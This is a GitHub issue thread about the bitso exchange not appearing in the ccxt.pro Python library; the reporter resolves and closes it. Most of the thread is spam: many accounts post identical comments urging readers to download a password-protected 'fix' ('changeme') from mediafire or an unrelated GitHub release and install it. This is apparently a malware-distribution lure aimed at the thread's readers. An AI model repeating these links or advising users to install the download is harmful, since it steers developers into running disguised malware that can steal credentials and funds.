### ISSUE TITLE
Bitso class not available to instantiate in the python library

### ISSUE THREAD

**Issue by santiago-mooser** [ccxt/ccxt#22979]
### Operating System

MacOS

### Programming Languages

Python

### CCXT Version

4.3.56

### Description

The python library does not allow you to instantiate a bitso exchange even though the source code is available in the repo:

https://github.com/ccxt/ccxt/blob/master/python/ccxt/bitso.py

### Code

```
>>> import ccxt.pro as ccxt
>>> ccxt.exchanges
['alpaca', 'ascendex', 'bequant', 'binance', 'binancecoinm', 'binanceus', 'binanceusdm', 'bingx', 'bitcoincom', 'bitfinex', 'bitfinex2', 'bitget', 'bithumb', 'bitmart', 'bitmex', 'bitopro', 'bitpanda', 'bitrue', 'bitstamp', 'bitvavo', 'blockchaincom', 'bybit', 'cex', 'coinbase', 'coinbaseexchange', 'coinbaseinternational', 'coincheck', 'coinex', 'coinone', 'cryptocom', 'currencycom', 'deribit', 'exmo', 'gate', 'gateio', 'gemini', 'hitbtc', 'hollaex', 'htx', 'huobi', 'huobijp', 'hyperliquid', 'idex', 'independentreserve', 'kraken', 'krakenfutures', 'kucoin', 'kucoinfutures', 'lbank', 'luno', 'mexc', 'ndax', 'okcoin', 'okx', 'onetrading', 'oxfun', 'p2b', 'phemex', 'poloniex', 'poloniexfutures', 'probit', 'upbit', 'vertex', 'wazirx', 'whitebit', 'woo', 'woofipro']
>>> ccxt.__version__
'4.3.56'
```

```
>>> ccxt.
ccxt.Exchange(               ccxt.bitfinex(               ccxt.bitvavo(                ccxt.cryptocom(              ccxt.htx(                    ccxt.lbank(                  ccxt.poloniex(
ccxt.alpaca(                 ccxt.bitfinex2(              ccxt.blockchaincom(          ccxt.currencycom(            ccxt.huobi(                  ccxt.luno(                   ccxt.poloniexfutures(
ccxt.ascendex(               ccxt.bitget(                 ccxt.bybit(                  ccxt.deribit(                ccxt.huobijp(                ccxt.mexc(                   ccxt.probit(
ccxt.bequant(                ccxt.bithumb(                ccxt.cex(                    ccxt.exchanges               ccxt.hyperliquid(            ccxt.ndax(                   ccxt.upbit(
ccxt.binance(                ccxt.bitmart(                ccxt.coinbase(               ccxt.exmo(                   ccxt.idex(                   ccxt.okcoin(                 ccxt.vertex(
ccxt.binancecoinm(           ccxt.bitmex(                 ccxt.coinbaseexchange(       ccxt.gate(                   ccxt.independentreserve(     ccxt.okx(                    ccxt.wazirx(
ccxt.binanceus(              ccxt.bitopro(                ccxt.coinbaseinternational(  ccxt.gateio(                 ccxt.kraken(                 ccxt.onetrading(             ccxt.whitebit(
ccxt.binanceusdm(            ccxt.bitpanda(               ccxt.coincheck(              ccxt.gemini(                 ccxt.krakenfutures(          ccxt.oxfun(                  ccxt.woo(
ccxt.bingx(                  ccxt.bitrue(                 ccxt.coinex(                 ccxt.hitbtc(                 ccxt.kucoin(                 ccxt.p2b(                    ccxt.woofipro(
ccxt.bitcoincom(             ccxt.bitstamp(               ccxt.coinone(                ccxt.hollaex(                ccxt.kucoinfutures(          ccxt.phemex(                 
```

**Comment by santiago-mooser** [comment]
Closing as it seems like the pro enpoint doesn't have support for bybit:

```
>>> import ccxt
>>> ccxt.exchanges
['ace', 'alpaca', 'ascendex', 'bequant', 'bigone', 'binance', 'binancecoinm', 'binanceus', 'binanceusdm', 'bingx', 'bit2c', 'bitbank', 'bitbay', 'bitbns', 'bitcoincom', 'bitfinex', 'bitfinex2', 'bitflyer', 'bitget', 'bithumb', 'bitmart', 'bitmex', 'bitopro', 'bitpanda', 'bitrue', 'bitso', 'bitstamp', 'bitteam', 'bitvavo', 'bl3p', 'blockchaincom', 'blofin', 'btcalpha', 'btcbox', 'btcmarkets', 'btcturk', 'bybit', 'cex', 'coinbase', 'coinbaseadvanced', 'coinbaseexchange', 'coinbaseinternational', 'coincheck', 'coinex', 'coinlist', 'coinmate', 'coinmetro', 'coinone', 'coinsph', 'coinspot', 'cryptocom', 'currencycom', 'delta', 'deribit', 'digifinex', 'exmo', 'fmfwio', 'gate', 'gateio', 'gemini', 'hitbtc', 'hitbtc3', 'hollaex', 'htx', 'huobi', 'huobijp', 'hyperliquid', 'idex', 'independentreserve', 'indodax', 'kraken', 'krakenfutures', 'kucoin', 'kucoinfutures', 'kuna', 'latoken', 'lbank', 'luno', 'lykke', 'mercado', 'mexc', 'ndax', 'novadax', 'oceanex', 'okcoin', 'okx', 'onetrading', 'oxfun', 'p2b', 'paymium', 'phemex', 'poloniex', 'poloniexfutures', 'probit', 'timex', 'tokocrypto', 'tradeogre', 'upbit', 'vertex', 'wavesexchange', 'wazirx', 'whitebit', 'woo', 'woofipro', 'xt', 'yobit', 'zaif', 'zonda']
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
